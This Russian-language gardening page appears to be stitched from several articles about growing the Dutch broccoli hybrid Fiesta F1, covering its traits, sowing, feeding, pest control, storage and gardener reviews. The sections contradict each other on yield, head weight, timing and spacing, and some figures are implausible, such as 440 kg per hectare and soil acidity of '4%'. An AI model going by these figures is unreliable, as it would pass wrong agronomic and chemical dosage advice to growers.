6 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Выращивание капусты брокколи фиеста

Выращивание капусты брокколи Фиеста

Капуста брокколи Фиеста была выведена в Голландии. Этот гибрид характеризуется средними сроками созревания, которые составляют 80-90 дней с момента посадки на постоянное место. Он отличается высокой урожайностью и хорошими вкусовыми качествами.

Выращивание капусты брокколи Фиеста

Основные характеристики разновидности

Брокколи выращивают в Центральных и Южных областях страны, где отмечаются высокие показатели урожайности (до 440 кг с 1 га). При посадке в Северной части количество урожая немного снижается (300 кг с 1 га).

Описание плода

Сорт капусты брокколи Фиеста категории f1 характеризуется возможностью формирования вертикальной розетки. Листья длинные. Их цвет сине-зеленый. На поверхности листа нрасположены небольшие пупырышки. Края ребристые, волнообразные. Слой воска средний.

Отличительной чертой сорта Фиеста брокколи категории f1 считается неспособность формировать боковые побеги.

Особенности плода

Головка созревшего плода характеризуется повышенной плотностью. У нее округлая форма, насыщенно-зеленый цвет с небольшой синевой. Средний вес плода составляет 1-1,2 кг. При правильном выращивании и уходе плоды сорта достигают веса в 2 кг.

Отмечают высокие показатели урожайности (5 кг с 1 кв. м). При перезревании продукция часто растрескивается, поэтому нельзя затягивать с уборкой.

Капуста брокколи Фиеста характеризуется насыщенным приятным вкусом. В ее составе присутствуют полезные химические элементы: фосфор, калий, магний и йод, — которые позволяют поддерживать баланс в организме человека. Продукт идеально подходит для тех, кто придерживается диетического питания. Плоды подходят для длительного хранения.

Особенности выращивания

Капусту высаживают рассадой

Согласно описанию, выращивание брокколи Фиеста категории f1 производят рассадным методом. Для этого в начале апреля в теплицу или контейнер высаживают семена. Они должны пройти процесс обеззараживания в марганцовом растворе (3 г на 5 л воды). Спустя 40 мин. их помещают в морозильную камеру для закалки.

Семена высаживают в контейнеры или теплицу по схеме 7 х 10 см. Ускорить процесс появления первых всходов позволяет температура 20°С-26°С. Ночью ее снижают до 15°С-17°С. Когда на растении проклевывается 2-3 пары листьев, приступают к посадке на постоянное место.

Высадку проводят в начале мая, когда земля прогрелась после зимы. Оптимальная температура почвы составляет 10°С-12°С, лучше выбирать плодородные. Хорошо подходят черноземы, песчаники или суглинистые земли. Их кислотный уровень не должен превышать отметку в 4%.

Выбирают незатененные участки, т. к. растение нуждается в солнечных лучах. Глубина посадки должна составлять 1-1,5 см. Между кустами придерживаются дистанции в 50 см, а между рядами — 70 см. Это позволяет растениям не затенять друг друга и полноценно формировать корневую систему.

Правила ухода за растением

Полив проводят по мере иссушения почвы. Для проживающих в регионе с влажной средой интервал полива должен составлять 7-10 дней. Если регион выращивания засушливый, — 2-3 дня. Нельзя допускать засушливости грунта или его чрезмерного увлажнения.

  • Спустя 20 дней после посадки на постоянное место разновидность нуждается в органических удобрениях — используют перегной, компост или древесную золу.
  • Вторую подкормку осуществляют в момент цветения капусты: применяют аммиачную селитру (20 г на 10 л воды) или нитрат калия (40 г на 10 л воды). Это позволяет сформироваться крупным плодам.
  • Третья подкормка предполагает использование суперфосфата (50 г на 10 л воды). Ее проводится за неделю до начала плодоношения. Она позволит улучшить насыщенность вкуса продукции.

Часто проводят мульчирование почвы. Грунт медленнее иссыхается, снижается уровень распространения сорняков. Для мульчи используют смесь соломы с перегноем в соотношении 1:1.

Болезни и вредители

Одним из самых распространенных заболеваний, которым подвергается этот вид, считается кила. Бороться с ней позволяет раствор бордосской жидкости (5 г на 10 л воды).

Эффективным средством против мучнистой росы станет раствор препарата «Хом». 10 г препарата разводят в 5 л воды и проводят опрыскивание участка.

В борьбе против бурой пятнистости спасает раствор препарата «Хомус» (30 г на 10 л воды).

Бороться с вредителями не менее просто, чем с болезнями. Избавиться от тли помогает раствор оксихома (40 г на 10 л воды). От майского жука и блошки применяют раствор марганца (10 г на 10 л воды). Борьба с червями и слизнями предполагает использование препарата «Силк» (30 г на 10 л воды). Интервал проведения опрыскиваний должен составлять 10-12 дней.

Капуста брокколи Фиеста: описание гибрида и агротехника выращивания и ухода

Сорт брокколи Фиеста: отзывы, фото, описание, посадка и уход

Полезная и довольно неприхотливая в уходе капуста брокколи пока еще нечастый гость на российских грядках в открытом грунте и в теплицах. И многие из овощеводов признаются, что даже ни разу не пробовали это овощное растение семейства крестоцветных.

А ведь селекционеры из разных стран мира вывели на сегодняшний день большое количество сортов и гибридов этой вкусной и полезной разновидности капусты, которые с успехом выращивают фермеры в других странах.

В данной статье будет рассказано о гибриде голландской селекции брокколи Фиеста F1, его основных характеристиках, достоинствах, нюансах выращивания в открытом грунте и о многом другом.

История сорта

История капусты брокколи насчитывает не одно столетие. Вначале она появилась в странах Восточного Средиземноморья, затем постепенно распространилась и в другие европейские страны. Завезли это овощное растение и в Америку, где его популярность стала просто огромной.

Фото капусты брокколи Фиеста

Хотя в настоящее время существует огромное число сортов и гибридов брокколи, но среди овощеводов и фермеров больше ценятся последние – у них выше продуктивность, больше стойкость к заболеваниям и изменению погодных условий.

Среди фермеров многих стран наиболее ценятся сорта и гибриды овощных культур, выведенные голландскими селекционерами, так как такие растения отличаются большим числом достоинств при минимуме недостатков, выращиваются практически на любых почвах, нетребовательны к уходу, не снижают урожайности даже при постоянных изменениях погодных условий.

Краткое описание капусты брокколи Фиеста — видео

Этот гибрид рекомендован для выращивания в открытом грунте не только в небольших фермерских хозяйствах, но и на промышленном уровне, так как брокколи Фиеста неприхотлива, не требует особого ухода, высокоурожайна. Многие дачники в отзывах о данном сорте пишут, что раз высадив эту разновидность капусты на своем огороде, предпочли в дальнейшем выращивать только данный гибрид.

Капуста брокколи Фиеста: описание сорта

Гибрид брокколи Фиеста относится к средне-ранним по срокам созревания сортам – от момента появления ростков до сбора созревших головок проходит около 90 дней. Поэтому многие дачники выращивают Фиесту для сбора урожая как в летний период, так и осенью.

У этого гибрида розетка из удлиненной сине-зеленой листвы расположена строго вертикально. Листья – волнистые, с характерным изгибом контура и заметной пузырчатостью. На листве заметен восковой налет сизоватой окраски. Брокколи Фиеста отличает от других сортов этой капусты отсутствие боковых побегов.

Созревающие головки – уплотненные (в этом очень схожи с цветной капустой), крупные, округлые, могут быть слегка сплюснутыми. Обычно вес их не превышает 1 кг, однако при соблюдении правил ухода отдельные головки могут вывешивать до 1,4-1,5 кг. Они частично прикрыты боковой листвой.

Собранный урожай универсален: его можно использовать для приготовления первых и вторых блюд, в качестве гарнира, замораживать на зиму. После разморозки головки не теряют своего товарного вида и вкусовых качеств.

Брокколи Фиеста при выращивании в открытом грунте не снижает урожайности даже в условиях резко изменяющейся температуры воздуха и влажности.

Урожайность капусты брокколи Фиеста

При выращивании на грядках в открытом грунте капуста брокколи Фиеста показывает высокую урожайность – до 3,5 кг с одного квадрата. А при своевременных подкормках, регулярных поливах продуктивность может возрастать.

Достоинства сорта

Основных положительных качеств у брокколи Фиеста много:

прекрасные вкусовые качества;

целебные качества головок;

хороший товарный вид собранного урожая брокколи;

неприхотливость к условиям выращивания и уходу;

  • высокая стойкость капусты Фиеста к большинству болезней.
  • Из отрицательных качеств данного сорта брокколи можно отметить только следующие:

    растение не образует боковых побегов, поэтому второй волны созревающего урожая не бывает;
  • поспевающий урожай капусты необходимо собирать сразу же – через пару дней головки просто рассыпаются.
  • Болезни и вредители, от которых страдает капуста брокколи

    Согласно описанию оригинаторов гибрида, брокколи Фиеста отличается повышенной устойчивостью к большинству болезней, поражающих другие сорта и гибриды овощных культур из семейства крестоцветных, в частности, к фузариозу.

    Фото чесночного настоя от вредителей — фото

    Вредители также практически не «нападают» на эту овощную культуру. Но в профилактических целях рекомендуется несколько раз за сезон обрабатывать брокколи Фиеста табачным или чесночным настоем, чтобы отпугнуть слизней, улиток и других вредителей.

    Агротехника выращивания капусты брокколи

    Посадка и уход за брокколи Фиеста будут описаны ниже.

    Для выращивания сорта брокколи Фиеста требуется хорошо освещенный участок с рыхлой плодородной почвой, без застоя влаги.

    Некоторые овощеводы выращивают эту разновидность капусты в закрытом грунте, но особой необходимости в этом нет, так как брокколи Фиеста прекрасно вызревает в открытом грунте.

    Брокколи Фиеста прекрасно успевает завязывать головки, которые доходят до товарного вида даже при посадке семян непосредственно в почву (безрассадным методом).

    Непосредственно в открытый грунт семена капусты брокколи рекомендуется высаживать не ранее последних чисел апреля (в зависимости от климатических условий региона), глубина заделки семян не более 2 см. Расстояние между растениями в ряду – не более 0,35 м, ширина междурядий – около 0,5 м.

    Семена капусты брокколи Фиеста — фото

    Грунт на участке лучше перекопать и удобрить в осенний период, внеся органику (перегной, компост или перепревший навоз).

    Дальнейший уход за растениями капусты брокколи сорта Фиеста стандартен: регулярные поливы, рыхление, удаление сорной травы, внесение подкормок.

    Если лето выдается дождливым, то этот гибрид поливать приходится крайне редко — брокколи Фиеста не переносит чрезмерного переувлажнения почвы. В засушливый период частота поливов – 1 раз в 2-3 дня.

    Этапы подкормки капусты брокколи в открытом грунте

    Брокколи очень требовательна к удобренности грунта, любит подкормки, хорошо на них отзывается.

    Подкормка капусты брокколи — видео

    В первый раз удобрения под молодые растения брокколи Фиеста вносят через 2 недели после пересадки в открытый грунт. Если семена брокколи садили сразу в открытый грунт, то первая подкормка производится примерно через три недели после появления всходом. Лучше всего для этого использовать настой органики – коровяка (1:10) , птичьего помета (1:20) или зеленушку. Такие настои следует предварительно выдерживать перед подкормками в тепле несколько дней. Но можно использовать и минеральную подкормку – например, раствор азофоски.

    Фото капусты брокколи Фиеста в открытом грунте

    Во второй раз брокколи подкармливают через пару недель после первого внесения удобрений.

    Третий раз подкормку капусты брокколи проводят в момент формирования на капусте соцветий. На этом этапе можно приготовить раствор из комплексных минеральных удобрений: взять 10 г аммиачной селитры, 5 г сульфата калия, 20 г суперфосфата и развести в 5 литрах воды.

    Капуста брокколи Фиеста F1: отзывы тех, кто сажал и выращивал

    Отзывов о данном гибриде представлено достаточно много, ниже приведены лишь некоторые из них.

    Екатерина, 39 лет, г. Воронеж:
    «Выращивала на участке различные сорта брокколи, но часто из-за погодных условий растения только цвели, но не вызревали головки. В одном сезоне посадила гибрид Фиеста f1, и теперь ежегодно выращиваю только его. Гибрид плодоносит при любых погодных условиях – ему не мешают ни жара, ни прохлада, ни дожди. Единственный минус – в продаже не всегда бывают семена брокколи Фиеста, поэтому если они мне попадаются – закупаю впрок, тем более что срок всхожести у них – до 3 лет.»

    Наталья, 46 лет, г. Волжский:
    «В прошлом сезоне посадила брокколи Фиесту на своих огородных грядках и осталась довольна результатом – получила большой урожай при минимальном уходе, головки отличаются прекрасным вкусом, имеют хороший товарный вид. Заморозила часть урожая в морозилке, а зимой доставала и готовила практически свежий продукт.»

    Екатерина, 40 лет, г. Тамбов:
    «В прошлом сезоне высадила Фиесту у себя на огороде. Предварительно в начале апреля посадила семена дома на рассаду, примерно через месяц пересадила их в открытый грунт. Несмотря на небольшие размеры, брокколи прекрасно принялась и пошла в рост. Особого ухода эти растения не требовали, главное, как я поняла, не допускать сильного пересыхания верхней части почвы. Лето выдалось практически без осадков, поэтому поливала грядки с капустой брокколи раз в 2-3 дня, рыхлила и удаляла сорную траву. Очень важно собирать спелые головки вовремя, я не успела несколько головок собрать – они переросли. Сажала брокколи Фиесту для сбора в летний период, второй раз подсаживала летом, а урожай собирала осенью. В результате сентябрьские кочаны брокколи получились больше по размеру и весу, а сами кустики были более мощными и сильными.»

    Брокколи Фиеста – один из гибридов этой овощной культуры, который не требует особого ухода, отличается высокой урожайностью, а собранный урожай – универсален. Семена сорта можно высаживать в апреле в открытый грунт (если прогрелась почва и позволяют погодные условия), а уже во второй или третьей декадах июня собирать высокий урожай. Капуста брокколи – это диетический продукт, поэтому он рекомендован для включения в рацион многим категориям граждан, в том числе и детям.

    Капуста брокколи Фиеста F1: описание и характеристика от производителя

    Среднеранний высокоурожайный гибрид голладской семеноводческой фирмы «Bejo Zaden». Готов к уборке через 85 дней после посева. Головка очень крупная, плотная, шарообразная. При правильной агротехнике вес центральной головки достигает 1,5 кг и более.

    Исключительно богата витаминами, обладает лечебными свойствами, идеально подходит для диетического питания. Гибрид хорошо переносит ночные колебания температуры, устойчив к ложной мучнистой росе. Посев на рассаду – с 1 по 10 апреля, пересадка с 1 по 10 мая, уборка с 10 по 20 июня.

    Производители: Гавриш, Русский огород, Аэлита, Семко, Росток, Седек и многие другие.

    Капуста брокколи Фиеста — видео

    Высокоурожайный среднеспелый гибрид капусты брокколи Фиеста f1

    Капуста брокколи прочно закрепилась на сельскохозяйственном рынке и заинтересовала огородников из разных регионов России. Один из лучших среднеспелых сортов с широкой географией распространения – голландский гибрид Фиеста F1. Продуктивность сохраняется даже в условиях холодного климата. Чем отличается Фиеста от других сортов?

    Обзорная характеристика ответит на все вопросы о качествах гибрида и особенностях агротехники выращивания.

    Описание гибрида капусты брокколи Фиеста F1

    Брокколи – это однолетняя спаржевая капуста из семейства крестоцветных. Родина культуры – Восточное Средиземноморье. Первое упоминание о брокколи относится к началу нашей эры.

    В XVIII веке овощ уже широко распространился по Европе и стал одним из самых популярных в Америке. В России эту капусту сажают умеренно — интерес к ней только начал набирать обороты. Это связано с особенностями климата и вкусовыми качествами овоща.

    История выведения

    Насчитывают около 200 сортов и гибридов брокколи. Гибриды по причине высокой урожайности ценятся выше, даже несмотря на то, что семена этих растений не пригодны для дальнейшего применения.

    Гибрид Фиеста F1 был получен голландскими селекционерами компании Bejo Zaden B. V. Путем сортовых перекомбинаций овощ приобрел лучшие качества родительских форм.

    В 1999 году гибридный сорт вошел в Госреестр и не ограничен территорией выращивания.

    Химический состав

    Важно! В 100 г овоща содержится 99% дневной нормы аскорбиновой кислоты.

    Брокколи содержит:

    • заменимые и незаменимые аминокислоты;
    • насыщенные, полиненасыщенные и мононенасыщенные жирные кислоты;
    • витамины – В1, В2, В5, В6, В9, К, Е, С, А, РР, НЭ, РЭ, ТЭ, альфа и бета-каротин, бетаин;
    • макроэлементы – кальций, калий, магний, кремний, натрий, фосфор, серу;
    • микроэлементы – марганец, хром, цинк, селен, медь, никель, железо, бор, йод.

    В 100 г овоща содержится:

    • белков – 2,8 г;
    • жиров – 0,4 г;
    • углеводов – 6,6 г;
    • воды – 89,3 г;
    • клетчатки – 2,6 г;
    • калорий – 34 ккал.

    Особенности применения

    Спаржевая капуста относится к диетическим продуктам, применяется в кулинарии и подходит для любой кулинарной обработки. Она входит в список гипоаллергенных продуктов.

    Срок созревания и урожайность

    Фиеста – среднеспелый овощ для летне-осенней уборки. Время выращивания – с мая по сентябрь. Период вегетации – 80 дней от высадки рассады.

    Гибрид отличается одновременным созреванием соцветий и стабильно-высоким урожаем – от 2,8 до 3,5 кг/м² или около 200 ц/га.

    Устойчивость к болезням, вредителям и холодам

    Растение обладает иммунитетом к фузариозному увяданию и устойчивостью к основным болезням культуры.

    Сорт адаптирован к резким перепадам температур. Рассада без повреждения головки выдерживает кратковременные заморозки до -8°C. Длительный период похолодания задержит, но не прекратит развитие.

    Характеристика, описание внешнего вида, вкусовые качества

    Растение внешне крепкое и компактное. Розетку формируют прямостоячие, черешковые листья и толстый стебель без боковых побегов. Листья – цельнокрайние, голубовато-зеленого цвета с тонким восковым налетом. Листовые пластины вытянутые, со слабой пузырчатостью и волнообразно изогнутые.

    Цветоносная головка плотная, округло-плоской формы, средних размеров и среднебугристая. Темная зелень отливает голубым цветом. Средний вес головки – около 800 г, максимальный – до 1,5 кг. Капуста отличается нежным, нейтральным вкусом с приятным ореховым послевкусием.

    Справка! Листья брокколи тоже съедобны и по вкусу напоминают стручковую фасоль.

    Для каких регионов подходит лучше всего и какая требовательность к климату

    Из-за своей неприхотливости, устойчивости к кратковременным весенним заморозкам и резкой смене погоды география выращивания гибрида весьма обширна. Он подходит для южных широт, средней полосы, Подмосковья, Урала и Сибири.

    Оптимальные условия для роста – от +18 до +25°C. При температуре выше +25°C соцветия становятся рыхлыми.

    Главные преимущества и недостатки гибрида

    К сильным сторонам относят:

    • крупноплодность;
    • устойчивость к весенним заморозкам;
    • высокую урожайность;
    • иммунитет к фузариозу;
    • устойчивость к основным болезням культуры;
    • товарный вид;
    • хорошую лежкость и транспортабельность.

    Из недостатков выделяют:

    • отсутствие боковых побегов;
    • чувствительность к повышению температуры;
    • короткие сроки на сбор урожая.

    В чем отличие от других сортов и гибридов

    Отличительные особенности брокколи Фиеста F1:

    • холодостойкость;
    • пластичность географии выращивания;
    • ореховый привкус;
    • возможность двухразовой посадки за сезон;
    • сохранение продуктивности при резкой смене погоды.

    Особенности посадки и выращивания

    В холодном и сыром климате культура показывает самую высокую продуктивность.

    Подготовка к посадке

    С осени готовят почву: перекапывают и удобряют перепревшим навозом. Весной землю рыхлят и вносят минеральные удобрения, древесную золу и доломитовую муку.

    Семена на рассаду первого срока высевают с середины марта до начала апреля, для второго срока – с первой декады апреля и до конца мая. Глубина заделки – не выше 0,5 см. Рассаду готовят в кассетах с ячейками 5х5 см.

    Температура до всходов – +20°C, с появлением ростков – +10-15°C, по мере роста снова повышают до +20°C. Как только появятся 2 настоящих листка – сеянцы пикируют.

    Как произвести безрассадную посадку

    В южных и средних широтах брокколи высевают в открытый грунт. Оптимальное время посева – конец апреля. Глубина заделки – 2 см. Сеют по схеме 60х30 см. До всходов грядки накрывают темной пленкой.

    Внимание! После крестоцветных брокколи высаживают спустя 4 года.

    Требования к грунту

    Для спаржевой капусты подходит плодородная, среднесуглинистая почва со слабо-кислотной или нейтральной реакцией. Грунт должен быть легким, с хорошей аэрацией. Площадки выбирают незатененные.

    Лучшие предшественники:

    Сроки, схема и правила посадки

    Рассаду сажают в открытый грунт в возрасте 30-35 дней. Растения первого посева пересаживают в мае, второго – в середине июня. Схема посадки – 60х30 см. Лунки заглубляют на 10-15 см.

    Вносят сантиметровый слой смеси из перегноя, древесной золы и толченого мела. Луковая шелуха отпугнет вредителей. Ямки хорошо поливают и высаживают брокколи. Работы ведут во второй половине дня.

    Особенности выращивания

    Недостаток влаги плохо сказывается на вкусовых качествах и внешнем виде овоща. Для выращивания брокколи лучше выбрать капельный способ полива.

    Сохранить влагу поможет мульчирование пристеблевой зоны. В засушливые периоды удобрения вносят раствором.

    Нюансы ухода

    Через неделю после высадки рассады междурядья рыхлят на глубину 4-6 см. В дальнейшем грядки заглубляют на 10-12 см, рыхлят после дождей и поливов. Сорняки пропалывают вручную. При оптимальной температуре от +18 до +25°C поливают через каждые 2-3 дня. Выше оптимальной – ежедневно по 2 раза в день.

    Подкармливают органикой, азотными и калийными удобрениями. Первый раз их вносят через 15 дней после высадки рассады или через 25 дней с момента прорастания семян. Второй раз – в период формирования головок и третий раз – за 2 недели до сбора урожая.

    Борьба с болезнями и вредителями

    Гибрид Фиеста устойчив к основным болезням семейства капустных. Для профилактики грибковых поражений растения опрыскивают фунгицидами и придерживаются оптимальной схемы высадки.

    Главная борьба ведется с садовыми вредителями:

    • от тли применяют раствор «Оксихома» и частые опрыскивания водой с пряными травами;
    • со слизнями и улитками борется препарат «Силк», помогает мульчирование грядок хвоей или опудривание древесной золой;
    • против майского жука и блошек эффективен раствор марганцовки;
    • капустную совку уничтожают «Лепидоцид», а гусениц – «Белофосом» и «Фосбецидом».

    Сбор и хранение урожая

    Овощи первого посева собирают в августе, второго – в сентябре.

    Как и когда собирать

    Как только зеленые головки гибрида полностью сформируются, их срезают вместе со стеблем. Через 2-3 дня они станут рыхлыми и зацветут – брокколи потеряет товарный вид, вкус испортится. Для сбора урожая выбирают утреннее или вечернее время – так плоды сохранят максимальную сочность.

    Особенности хранения

    У брокколи хорошая лежкость, но срок хранения урожая небольшой и зависит от температуры и влажности:

    • в комнатных условиях – 3-5 дней;
    • в холодильнике (+5…+7°C) – 3 недели;
    • в погребе (-1…0°C) – 2 месяца;
    • шоковая заморозка (-18°C) – 8 месяцев.

    Оптимальный вариант хранения – в замороженном виде. Головки разделяют на соцветия с ножкой не больше 1-2 см. Овощи моют, просушивают, замораживают на лотках в один слой и фасуют по пакетам.

    Для хранения в подвале подойдут ящики с перфорированными стенками. Дно ящиков застилают влажной тканью. Головки ставят ножками на ткань, чтобы они не касались друг друга. Сверху ящики закрывают пленкой. Оптимальная температура хранения – -1…0°C при влажности воздуха 80-90%.

    Какие могут быть трудности при выращивании

    С гибридом Фиеста F1 особых проблем не возникнет. Основная задача – организовать правильный полив, профилактику от вредителей и успеть вовремя собрать урожай.

    Отзывы огородников о капусте брокколи Фиеста F1

    Дачники с опытом выращивания брокколи считают Фиесту надежным и проверенным годами гибридом. Отмечают высокую урожайность и качество вкуса. Многие профессионалы сажают только Фиесту и рекомендуют новичкам.

    Юлия, г. Кострома: «У нас брокколи стоит недешево, да и не всегда бывает в магазинах. Решила вырастить на даче, самостоятельно. Мне посоветовали голландский гибрид Фиеста. Рассада получилась вытянутой и хрупкой, но капуста все-таки выросла, и урожаем я довольна. Приятно удивил легкий ореховый привкус. Это лучшая брокколи из всех, что я пробовала».

    Ольга Васильевна, г. Подольск: «Гибрид Фиеста сажаю уже несколько лет. Всхожесть семян отличная и урожайность хорошая, даже если погода подводит. Капуста иногда клонится набок, поэтому рекомендую окучивать».

    Заключение

    Брокколи Фиеста подходит для выращивания в разных регионах. Растение сохранит продуктивность при температуре от -5 до +25°C. Оптимальный диапазон – +18…+25°C. Гибрид устойчив к болезням и неприхотлив. Своевременный полив гарантирует высокую урожайность. Собирают головки не позднее 2-3 дней после созревания.

    Фиеста — один из лучших гибридов капусты брокколи

    Капуста брокколи пока ещё редко выращивается в российских огородах, многие люди даже никогда её не видели, а тем более не пробовали. Однако у неё есть масса сортов и гибридов как отечественной, так и зарубежной селекции. Одним из лучших голландских гибридов брокколи среднего срока созревания является Фиеста F1; поклонников этой капусты уже немало в нашей стране.

    История выращивания брокколи сорта Фиеста

    Капуста брокколи впервые появилась в Восточном Средиземноморье, она известна со времён Древнего Рима, описание брокколи обнаружено археологами ещё в источниках, относящихся к началу нашей эры. В остальных странах Европы она известна с XVII века, а в следующем столетии была занесена и в Америку, где приобрела необычайную популярность. Сейчас там известно множество рецептов приготовления этого диетического продукта.

    Нельзя сказать, что она очень вкусна: скорее, это некий пресный овощ, и гурманы употребляют её с различными экзотическими соусами.

    Видимо, поэтому в нашей стране её едят далеко не все, а сажают в своём огороде редкие дачники. А полюбившие брокколи люди могут купить её даже в разделанном и приготовленном к употреблению виде во многих магазинах.

    Сейчас существует множество сортов и гибридов этой капусты (более 200), и больше ценятся именно гибриды: как правило, у них выше урожайность, они меньше подвержены болезням и более стойки к неблагоприятным условиям. Одним из таких гибридов является Фиеста F1. Он создан в результате селекции специалистами голландской компании BEJO ZADEN. Произошло это уже довольно давно, в конце прошлого тысячелетия, а с 1999 года гибрид появился и в нашей стране, для этого было даже выпущено специальное разрешение соответствующих органов.

    Надпись на пакете: 10 шт., недешёвое это удовольствие

    Гибрид Фиеста F1 рекомендуется для выращивания в хозяйствах самого разного права собственности: на личных (приусадебных и дачных) огородах, малых и крупных фермерских хозяйствах. Это связано с неприхотливостью гибрида и высокой урожайностью. Согласно отзывам о нём, те огородники, которые попробовали посадить у себя Фиесту, делают это ежегодно, заменяя им другие привычные для себя сорта.

    Описание сорта

    Гибрид голландской семеноводческой фирмы Bejo Zaden Фиеста относится к числу среднеранних гибридов брокколи. Для созревания головок требуется чуть меньше трёх месяцев с момента посева семян, поэтому он подходит как для летнего, так и для осеннего выращивания. Фиеста образует вертикальную розетку длинных листьев сине-зелёного цвета, на листьях присутствуют характерные волны, изгибы контура и сильная пузырчатость. Листья слегка покрыты сизоватым восковым налётом. В отличие от большинства сортов, Фиеста не образует боковых побегов.

    Над головкой возвышаются мощные яркие листья

    Головка крупная, округлая, иногда слегка приплюснутая, высокой плотности (практически как у цветной капусты), тёмно-зелёного цвета с синевой. Обычная её масса составляет около 1 кг, но при правильной агротехнике часто достигает и 1,5 кг. Головка частично накрыта боковыми листьями. Характеризуется отличным вкусом, повышенным содержанием витаминов, идеальна для соблюдающих диету. Использование универсальное: подходит для приготовления различных первых и вторых блюд, гарниров. Отлично зарекомендовала себя и после заморозки.

    Гибрид нечувствителен к резким изменениям температурного и влажностного режимов, обладает повышенной устойчивостью к большинству капустных заболеваний, в том числе фузариозу. Урожайность высокая, порядка 3,5 кг/м 2 . В пределах одной грядки головки выровненные, то есть мало отличаются по размеру и сроку созревания.

    Характеристика брокколи Фиеста

    Из приведённого описания становится ясной причина популярности гибрида Фиеста F1: у него масса достоинств и почти нет недостатков. Гибрид распространён в России, Украине и Молдове. Итак, важнейшие достоинства Фиесты:

    • очень высокая урожайность;
    • отличный вкус;
    • целебность готового продукта;
    • товарность плодов;
    • универсальность использования;
    • непритязательность к условиям выращивания;
    • устойчивость к заболеваниям.

    Ничто в мире не лишено недостатков. Относительных минусов у гибрида, пожалуй, два:

    • отсутствие боковых побегов и, как следствие, дополнительных головок: второй волны урожая ждать не приходится;
    • очень сжатое время для уборки: поспевший урожай должен быть снят в течение нескольких дней, после чего головки начинают рассыпаться.

    Особенности выращивания брокколи сорта Фиеста

    Выращивание брокколи почти не отличается от выращивания других разновидностей капусты. Она тоже требует много питательных веществ и влаги, а также естественного света. Брокколи не переносит жару и поражается теми же болезнями и вредителями, что и другие виды капусты.

    Иногда брокколи выращивают в теплице, но в этом не особой необходимости: она замечательно растёт в открытом грунте. Срок вегетации даже для поздних сортов составляет не более четырёх месяцев, поэтому лета в России вполне достаточно, чтобы оставить теплицу для других, более теплолюбивых овощей. Нет большого смысла и в выращивании рассады. По крайней мере, летние урожаи, готовые к уборке с середины июля до конца сентября, можно даже в северных областях получать в открытом грунте. Она прекрасно успевает завязать головки и довести их до товарного состояния после посева семян прямо в грунт.

    Если же есть желание получить очень ранние урожаи, можно выращивать брокколи через рассаду, но сеять семена для этого лучше в парники: в условиях городской квартиры рассаде очень жарко. Для Фиесты оптимальное время посева на рассаду — первая декада апреля. В таком случае через месяц её можно пересаживать в открытый грунт, а в конце июня срезать готовые головки. Однако для обычного летнего потребления Фиесту можно сразу посеять в грядку, на постоянное место.

    В условиях Центральной зоны России посев Фиесты в огороде возможен в конце апреля, как только с землёй можно будет работать. Глубина посева — около 2 см, расстояния между лунками в рядах 30–35 см, между рядами — полметра. Грядка должна быть солнечная, лучшая почва — с нейтральной средой, перекопанная и удобренная с осени. На квадратный метр вносят по ведру компоста и литровой банке древесной золы. Если посеять совсем рано, можно каждую семечку накрыть обрезанной пластиковой бутылкой: на первое время, пока станет теплее, такого укрытия достаточно.

    Основные мероприятия по уходу за Фиестой — те же, что и за большинством овощных культур: полив, прополка, рыхление, подкормка.

    В дождливые сезоны поливать приходится редко, ведь много воды Фиесте не требуется, но почва должна быть постоянно влажной. В сухое лето поливы требуются частые, иногда и до трёх раз в неделю.

    При хорошем уходе брокколи вырастает большим растением

    Мульчирование грядок сплошным ковром любыми сыпучими материалами помогает не только поддерживать грядки во влажном состоянии, но и бороться с не слишком злостными сорняками. Без применения мульчи после каждого дождя или полива требуется рыхление. Его нужно проводить до тех пор, пока листья соседних растений не сомкнутся в рядах между собой.

    Первая подкормка нужна дней через 20 после появления всходов. Лучше использовать для подкормок настои органических удобрений (коровяка, птичьего помёта, просто сорных растений), но можно и растворы комплексных минеральных (например, азофоски). Вторая подкормка проводится ещё через 10–15 дней. После внесения подкормок грядку надо дополнительно полить чистой водой.

    Со сбором урожая Фиесты совершенно нельзя запаздывать. Любое изменение цвета головок, по сравнению с характерным для Фиесты тёмно-зелёным, означает, что уже пошёл распад полезных веществ, и вкус брокколи будет уже не тот. А если раскрылись бутоны, головки в пищу уже непригодны. Если гнаться за слишком большими размерами и ждать, пока капуста ещё подрастёт, можно упустить нужный момент.

    Видео: специалист о сортах брокколи Фиеста и Батавия

    Отзывы огородников

    У меня тоже были проблемы с брокколи, пока не попала на сорт «фиеста», теперь закупаю на пару лет вперёд, а то не всегда в продаже есть. Раньше всякие сорта пробовала одни цветы, а фиеста каждый год не подводит, хоть жара, хоть дожди…я считаю выбор сорта, для каждой местности, тоже имеет большущее значение.

    Разум

    http://forum.prihoz.ru/viewtopic.php?t=1405&start=45

    Прекрасный нововыведенный сорт. Сажала в этом году. Результатом очень довольна. Особенным достоинством этого гибрида является то, что он хорошо переносит заморозку, то есть зимой можно готовить практически свежую брокколи.

    Наталья Виничук

    http://ogorodnik.by/product/semena-ovoshhej/kapusta-brokkoli/kapusta-brokkoli-fiesta-f1–20-sht/

    В прошлом году прекрасно себя показали Фиеста F1 и Линда. Семена на рассаду посеяла 11 апреля дома, высадила в грунт малипусенькие кустики 14 мая. Место для них получилось частично притенённое, забор и старая яблоня недалеко. И с 11 растений собрала столько, что и сегодня один ящик морозилки забит очень нежными небольшими головками. Большие были съедены летом. Конечно, лето 1911 года было не такое жаркое, как предыдущее. Уход за брокколи заключался только в поливе, старалась не дать пересохнуть земле, что не всегда получалось. Изредка, пока кустики росли, рыхлила. И главное, как ты правильно пишешь — вовремя убирать. У меня самый основной урожай получается поздно осенью, в сентябре-октябре. Кусты становятся мощными, ветвятся. Отличный овощ!

    Наталия

    http://pensionary.ru/forum/showthread.php?646-%D0%91%D1%80%D0%BE%D0%BA%D0%BA%D0%BE%D0%BB%D0%B8-%D1%81%D0%B0%D0%BC%D1%8B%D0%B9-%D0%BF%D0%BE%D0%BB%D0%B5%D0%B7%D0%BD%D1%8B%D0%B9-%D0%BE%D0%B2%D0%BE%D1%89-%D0%B4%D0%BB%D1%8F-%D0%B6%D0%B5%D0%BD%D1%89%D0%B8%D0%BD

    Капуста брокколи Фиеста F1 — один из самых несложных в выращивании гибридов, обладающий высокой урожайностью головок отличного вкуса и универсального назначения. Её не обязательно выращивать через рассаду, и апрельский посев семян на постоянное место даст возможность в июне снимать достойный урожай. Диетические свойства продукта позволяют рекомендовать его большинству населения нашей страны.

    Капуста брокколи, что необходимо знать для выращивания и ухода в открытом грунте

